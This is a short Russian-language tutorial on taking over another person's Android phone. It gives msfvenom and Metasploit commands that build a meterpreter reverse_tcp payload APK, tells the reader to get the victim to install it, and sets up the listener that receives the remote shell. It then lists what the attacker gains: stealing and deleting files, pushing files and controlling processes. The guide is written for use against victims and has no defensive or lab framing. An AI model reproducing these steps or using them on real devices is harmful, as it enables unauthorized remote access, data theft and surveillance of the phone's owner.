Получаем полный доступ к чужому телефону

С чего начнём?

Для начала нужно установить приложение Termux и в нём фреймворк "Metasploit". В прошлых статьях об этом я уже говорил.

pkg update

Далее нужно перейти по следующему пути, введя команду

/data/data/com.termux/files/usr/opt/metasploit-framework

Введя команду ls вы должны увидеть примерно это:

Теперь создаем файл который будем кидать жертве, командой

msfvenom -p android/meterpreter/reverse_tcp LHOST=(наш IP) LPORT=4444 R> /sdcard/payload.apk

Мы создали файл, который хранится в пути /sdcard/payload.apk

Теперь нужно скинуть его жертве и жертва должна установить этот apk файл на своё устройство. Допустим жертва установила apk на своё устройство. Мы же запускаем metasploit и поочередно вводим каждую команду

use exploit/milti/handler

set payload android/meterpreter/reverse_tcp

set LHOST (наш тот же IP)

set LPORT 4444

exploit

Если всё прошло успешно, вы получите полный доступ к устройству жертвы. Введя команду help можно будет посмотреть список доступных команд. Вкратце расскажу, что можно будет сделать:

1. Скачивать, удалять файлы жертвы
2. Скидывать в его устройство свои файлы
3. Посмотреть полную информацию о его устройстве
4. Контролировать процессы устройства